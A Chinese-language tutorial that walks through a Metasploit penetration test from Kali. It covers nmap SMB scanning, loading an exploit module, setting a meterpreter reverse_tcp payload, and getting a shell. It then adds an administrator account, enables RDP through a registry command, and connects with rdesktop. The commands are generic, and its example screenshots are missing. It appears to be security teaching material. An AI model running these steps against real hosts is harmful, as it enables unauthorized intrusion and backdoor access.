介绍:本文是展示在Kali中通过使用metasploit工具进行渗透测试的流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。
挂个链接:深信服产业教育中心
常规流程如下:
打开Metasploit工具界面:
1.首先对目标主机进行扫描寻找漏洞
nmap --script smb-vuln xx漏洞名.nse [目标机IP]
示例:
2.启动Metasploit
msfdb init && msfconsole
3.在msf终端下查找相关漏洞模块
search 漏洞名
示例:
4.若metasploit版本过低导致没有针对某操作系统的攻击代码,可以将攻击代码写入/usr/share
/Metasploit-framework/modules/exploits/xx系统/xx协议/xx漏洞名 中
示例:
5.写入攻击代码(视情况写/不写)后重启msf
exit
msfconsole
6.进入模块
use exploit/xx系统/xx协议/xx漏洞名 或者使用use 0 (注:进入模块前务必search一下相关漏洞模块)
7.查看该模块需要设置哪些参数(一般默认即可)
show options
8.设置相关参数
set LHOST IP address //设置本地(攻击者)主机IP地址
set RHOST IP address //设置远程(被攻击者)主机IP地址
set RPOST post //设置目的端口
set payload xx系统/meterpreter/reverse_tcp //设置payload(也称shellcode,攻击载荷,后面接系统目录路径)
9.查找可用目标(查找漏洞能够攻击的相关操作系统,可遍历也可查找自己需要的操作系统进行下一步操作)
show targets
示例:
10.找到相关ID后设置所攻击目标的操作系统类型:
set targets id xx
示例:
11.执行溢出漏洞攻击命令(exploit命令调用了payload)
run/exploit
执行成功后会显示系统路径目录的相关信息(因为调用了payload,而之前payload设置时选择了相关系统目录路径),最后再该相关信息下直接输入shell命令即可拿到目标主机的shell,
示例:
12.创建账号密码,获取的权限够大的话可以将该账号权限提升至管理员权限
比如创建一个cyz用户,密码为123456
net user cyz 123456 /add
提升管理员权限命令:net user cyz 123456 /add && net localgroup administrators cyz /add
13.开启远程登录端口:
echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
14.检查是否开启3389端口:
netstat -ano
15.验证该主机是否可以正常远程登录:
重新打开一个kali命令行终端,输入rdesktop IP address:3389来远程登录目标主机
至此测试流程已完成(登不登的上就看情况了~)
示例: